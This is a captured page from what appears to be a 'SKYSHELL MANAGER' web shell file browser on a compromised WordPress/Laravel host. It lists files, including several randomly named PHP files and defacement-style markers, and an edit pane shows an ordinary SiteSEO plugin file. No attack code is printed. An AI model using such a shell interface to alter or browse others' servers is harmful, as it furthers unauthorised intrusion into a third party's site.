📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: columns.php
<?php /* * SITESEO * https://siteseo.io * (c) SiteSEO Team */ namespace SiteSEO; if(!defined('ABSPATH')){ die('HACKING ATTEMPT!'); } class Columns{ static function add_columns($colums){ global $siteseo; if(empty($siteseo->setting_enabled['toggle-advanced'])){ return $colums; // toggle disable } $options = $siteseo->advanced_settings; if(!empty($options['appearance_title_col'])){ $colums['seo_title'] = __('Title tag', 'siteseo'); } if(!empty($options['appearance_meta_desc_col'])){ $colums['meta_description'] = __('Meta Desc' , 'siteseo'); } if(!empty($options['appearance_redirect_enable_col'])){ $colums['redirect_enabled'] = __('Redirect?', 'siteseo'); } if(!empty($options['appearance_redirect_url_col'])){ $colums['redirect_url'] = __('Redirect URL', 'siteseo'); } if(!empty($options['appearance_canonical'])){ $colums['canonical_url'] = __('Canonical', 'siteseo'); } if(!empty($options['appearance_target_kw_col'])){ $colums['target_keyword'] = __('Target Kw', 'siteseo'); } if(!empty($options['appearance_noindex_col'])){ $colums['noindex'] = __('noindex?', 'siteseo'); } if(!empty($options['appearance_nofollow_col'])){ $colums['nofollow'] = __('nofollow?', 'siteseo'); } if(!empty($options['appearance_words_col'])){ $colums['word_count'] = __('Words', 'siteseo'); } if(!empty($options['appearance_score_col'])){ $colums['seo_score'] = __('Score', 'siteseo'); } return $colums; } static function populate_custom_seo_columns($column, $post_id){ global $siteseo; if(empty($siteseo->setting_enabled['toggle-advanced'])){ return; // toggle disable } $options = $siteseo->advanced_settings; switch($column){ case 'seo_title': if(!empty($options['appearance_title_col'])){ $title = get_post_meta($post_id, '_siteseo_titles_title', true); echo esc_html(\SiteSEO\TitlesMetas::replace_variables($title)); } break; case 'meta_description': if(!empty($options['appearance_meta_desc_col'])){ $desc = get_post_meta($post_id, '_siteseo_titles_desc', true); $replaced_desc = \SiteSEO\TitlesMetas::replace_variables($desc); echo esc_html($replaced_desc); } break; case 'redirect_enabled': if(!empty($options['appearance_meta_desc_col'])){ $redirect_enabled = get_post_meta($post_id, 'siteseo_redirections_enabled', true); echo $redirect_enabled ? esc_html__('Yes', 'siteseo') : esc_html__('No', 'siteseo'); } break; case 'redirect_url': if(!empty($options['appearance_redirect_enable_col'])){ echo esc_url(get_post_meta($post_id, '_siteseo_redirections_value', true)); } break; case 'canonical_url': if(!empty($options['appearance_redirect_url_col'])){ echo esc_url(get_post_meta($post_id, '_siteseo_robots_canonical', true)); } break; case 'target_keyword': if(!empty($options['appearance_canonical'])){ $keywords = esc_html(get_post_meta($post_id, '_siteseo_analysis_target_kw', true)); echo !empty($keywords) ? esc_html($keywords) : ''; } break; case 'noindex': if(!empty($options['appearance_noindex_col'])){ $noindex = get_post_meta($post_id, '_siteseo_robots_index', true); echo $noindex ? esc_html__('Yes', 'siteseo') : esc_html__('No', 'siteseo'); } break; case 'nofollow': if(!empty($options['appearance_nofollow_col'])){ $nofollow = get_post_meta($post_id, '_siteseo_robots_follow', true); echo $nofollow ? esc_html__('Yes', 'siteseo') : esc_html__('No', 'siteseo'); } break; case 'word_count': if(!empty($options['appearance_words_col'])){ $content = get_post_field('post_content', $post_id); echo esc_html(str_word_count(wp_strip_all_tags($content))); } break; case 'seo_score': if(!empty($options['appearance_score_col'])){ $score = get_post_meta($post_id, '_siteseo_score', true); if($score !== ''){ $score = round($score); if($score < 50){ $color = '#f33'; // error } elseif($score < 80){ $color = '#fa3'; // warning } else{ $color = '#0c6'; // good } echo '<div class="siteseo-score-circle" style="background:'.esc_attr($color).';">'.esc_html($score).'</div>'; } else { echo ''; } } break; } } static function make_seo_columns_sortable($columns){ global $siteseo; if(empty($siteseo->setting_enabled['toggle-advanced'])){ return $columns; // toggle disable } $options = $siteseo->advanced_settings; if(!empty($options['appearance_title_col'])){ $columns['seo_title'] = 'seo_title'; } if(!empty($options['appearance_meta_desc_col'])){ $columns['meta_description'] = 'meta_description'; } if(!empty($options['appearance_target_kw_col'])){ $columns['target_keyword'] = 'target_keyword'; } if(!empty($options['appearance_words_col'])){ $columns['word_count'] = 'word_count'; } if(!empty($options['appearance_score_col'])){ $columns['seo_score'] = 'seo_score'; } return $columns; } static function hide_genesis_seo(){ global $siteseo; if(empty($siteseo->setting_enabled['toggle-advanced'])){ return; // toggle disable } $options = $siteseo->advanced_settings; if(!empty($options['appearance_genesis_seo_menu'])){ remove_theme_support('genesis-seo-settings-menu'); } if(!empty($options['appearance_genesis_seo_metaboxe'])){ remove_action('admin_menu', 'genesis_add_inpost_seo_box'); } } }
Save